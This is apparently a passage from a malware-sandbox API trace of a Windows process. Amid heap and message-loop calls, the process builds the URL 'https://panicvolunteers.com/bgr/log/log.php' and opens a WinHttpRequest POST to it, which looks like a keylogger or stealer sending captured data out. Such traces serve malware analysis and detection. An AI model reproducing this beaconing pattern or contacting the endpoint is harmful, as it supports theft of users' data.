hHeap=0x8a0000) returned 1 [0242.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25f8 | out: hHeap=0x8a0000) returned 1 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2c) returned 0xa3d380 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25f8 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0xa11178 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25c8 [0242.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa3d380, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0xa11238 [0242.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa3d380, cbMultiByte=44, lpWideCharStr=0xa11238, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa11238 | out: hHeap=0x8a0000) returned 1 [0242.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d380 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25f8 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca218 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25b8 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0242.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0242.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2608 | out: hHeap=0x8a0000) returned 1 [0242.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0242.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0242.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2608 [0242.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0242.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0242.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0242.623] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 1 [0242.623] NtdllDefWindowProc_W () returned 0x1 [0242.624] NtdllDefWindowProc_W () returned 0x1 [0242.624] NtdllDefWindowProc_W () returned 0x1 [0242.624] NtdllDefWindowProc_W () returned 0x1 [0242.624] NtdllDefWindowProc_W () returned 0x1 [0242.624] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.625] NtdllDefWindowProc_W () returned 0x1 [0242.626] NtdllDefWindowProc_W () returned 0x1 [0242.626] NtdllDefWindowProc_W () returned 0x1 [0242.626] NtdllDefWindowProc_W () returned 0x1 [0242.626] NtdllDefWindowProc_W () returned 0x1 [0242.626] NtdllDefWindowProc_W () returned 0x1 [0242.626] TranslateMessage (lpMsg=0x87f1a4) returned 0 [0242.626] DispatchMessageW (lpMsg=0x87f1a4) returned 0x0 [0242.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e92d0 [0242.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25b8 [0242.626] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e840) returned 1 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e92d0 | out: hHeap=0x8a0000) returned 1 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25b8 | out: hHeap=0x8a0000) returned 1 [0242.630] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0242.630] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0242.630] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 0 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25b8 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25f8 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e92d0 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25e8 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e92d0 | out: hHeap=0x8a0000) returned 1 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25e8 | out: hHeap=0x8a0000) returned 1 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25f8 | out: hHeap=0x8a0000) returned 1 [0242.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25b8 | out: hHeap=0x8a0000) returned 1 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0xc42218 [0242.630] PeekMessageW (in: lpMsg=0x87f1a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f1a4) returned 0 [0242.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25b8 [0242.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25b8 | out: hHeap=0x8a0000) returned 1 [0242.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc1f0 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc42218 | out: hHeap=0x8a0000) returned 1 [0242.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc1f0 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db960 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5068 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2608 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0242.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0242.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0242.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba108 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2d0 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2b8 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d90 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0242.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1f0 | out: hHeap=0x8a0000) returned 1 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0242.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bc910 [0242.632] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="Open", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=1) returned 0x0 [0242.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0242.636] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x8e7738, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f378 | out: ppTInfo=0x87f378*=0x9d414c) returned 0x0 [0243.261] ITypeInfo:RemoteGetTypeAttr (in: This=0x9d414c, ppTypeAttr=0x87f370, pDummy=0x356310 | out: ppTypeAttr=0x87f370, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalGetIDsOfNames (This=0x9d414c) returned 0x0 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x0, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x1, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x2, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x3, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x4, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x5, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x6, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x7, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.368] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x8, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.368] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.369] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x9, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.369] ITypeInfo:LocalReleaseTypeAttr (This=0x9d414c) returned 0xbfd380 [0243.369] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0x9c0380 [0243.369] WinHttpRequest:IUnknown:Release (This=0x9d414c) returned 0x1 [0243.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0xc3d128 [0243.369] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f468*(rgvarg=([0]=0xc3d12c*(varType=0xb, wReserved1=0x0, wReserved2=0x384, wReserved3=0x9c, varVal1=0x0, varVal2=0x0), [1]=0xc3d13c*(varType=0x8, wReserved1=0xa3, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xc3d14c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=([0]=0xc3d12c*(varType=0xb, wReserved1=0x0, wReserved2=0x384, wReserved3=0x9c, varVal1=0x0, varVal2=0x0), [1]=0xc3d13c*(varType=0x8, wReserved1=0xa3, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xc3d14c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0243.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0243.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2578 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc3d128 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0243.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa11178 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de808 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.400] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2578 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25c8 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3b8 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc958 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc9b8 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc928 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc8e0 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2568 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0243.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e868 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0243.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2568 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc1f0 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de808 | out: hHeap=0x8a0000) returned 1 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2568 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0243.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22) returned 0xc33b08 [0243.401] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=2) returned 0x0 [0243.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc33b08 | out: hHeap=0x8a0000) returned 1 [0243.401] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x8e7738, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f378 | out: ppTInfo=0x87f378*=0x9d414c) returned 0x0 [0243.402] ITypeInfo:RemoteGetTypeAttr (in: This=0x9d414c, ppTypeAttr=0x87f370, pDummy=0x356310 | out: ppTypeAttr=0x87f370, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalGetIDsOfNames (This=0x9d414c) returned 0x0 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x0, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x1, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x2, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x3, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x4, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x5, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x6, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 